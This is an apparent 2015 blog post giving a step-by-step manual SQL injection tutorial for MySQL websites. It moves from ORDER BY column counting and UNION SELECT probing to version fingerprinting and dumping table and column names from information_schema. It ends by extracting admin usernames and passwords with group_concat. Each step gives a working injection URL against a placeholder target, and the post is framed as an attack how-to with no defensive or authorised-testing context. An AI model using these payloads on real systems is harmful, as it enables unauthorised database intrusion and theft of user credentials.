Monday, 19 January 2015

MY SQL Database Manual SQL Injection Tutorail

MY SQL Database Manual SQL Injection Tutorail

Hello guys, hope you all are doing great. Today i will explain manual SQL Injection on MYSQL database. Requirement for this is only a sqli vulnerable site and some patience. For this tutorial, we’ll be using “http://www.target.com” as an example.

Lets get started.. 

[#] Find The  Number Of Columns


First step is to find the number of column it has. Add "order by 1--" (without quotes) to the end of url

Example:

http://target.com/news.php?id=76 order by 1--

Then Increment the 1 until you get an error saying "unknown column" 

Example:

http://target.com/news.php?id=76 order by 1-- NO ERROR 
http://target.com/news.php?id=76 order by 2-- NO ERROR 
http://target.com/news.php?id=76 order by 3-- NO ERROR 
http://target.com/news.php?id=76 order by 4-- NO ERROR 
http://target.com/news.php?id=76 order by 5-- ERROR
we have got error at 5 it means there are 4 cloumns. 

[#] Finding Vulnerable Columns

Now that we found the number of columns, time to find the vulnerable column using  "union select" statement. First remove all queries we have added. Now null the parameter by adding "-" (without quotes) before the number.

Example:
http://target.com/news.php?id=-76
In our first step we have found there are 4 columns so our query will be. 

Example:
http://target.com/news.php?id=-76 union select 1,2,3,4--
Now you will get some numbers on screen choose any For example we will take 3 

[#] Finding Version

Now we know the vulnerable column which is 3 in our example, time to check which version of MYSQL is running we have to check this because SQL injecting version 4 and 5 is different. Alright now replace 3 with "version()"

Example:
http://www.target.com/index.php?id=-2 union select 1,2,version(),4--

Now It will show the MYSQL version something like this 5.1.52-log. 

[#] Finding the Table Name

Now  we have to find the table names it has. If the version you have got is 4.x.x then you have to pretty much guess everything. With MYSQL 5 came information_schema which stores tables and column names and group_concat() for getting every information at once, making our job a lot easier. I will be explaining MYSQL 5, Replace the 3 with   "group_concat(table_name)" and "from information_schema.tables   where table_schema=database()--" to the end

Examle:

http://www.target.com/index.php?id=-2 union select  1,2,group_concat(table_name),4 from  information_schema.tables  where table_schema=database()--

Now it will show the list of all table names in database. Choose any table name you wish. in our example we will take "admin". 

[#] Finding the Column Name


Now replace the "group_concat(table_name) with "group_concat(column_name)" and replace the "from information_schema.tables where  table_schema=database()--" with "from information_schema.columns where table_name=0x41646d696e--"

Example:
http://www.target.com/index.php?id=-2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e--


if you have noticed you might be wondering whats this "0x41646d696e" First of all these are called hex. 41646d696e is the hex value of "admin" which is our table name in example and 0x to make hex readable. We will have to convert the table name to hex in order to retrieve info. For converting text to hex visit this website 
http://www.swingnote.com/tools/texttohex.php 
ok now we will have the column names. 

[#] Final Data Extraction

Say for instance we have got the following columns username, password Replace "group_concat(table_name)" with "group_concat(username,0x3a,password)" and "from information_schema.columns where table_name=0x41646d696e-- with "from admin

Example:
www.target.com/news.php?id=-76+union+select +1,2,group_concat (username,0x3a,password),4+from+admin

0x3a is hex value of : its just for seperation of result. 
Now finally we can see the data :D 


Thats all guys! 
Stay safe and gud luck!


0 comments:

Post a Comment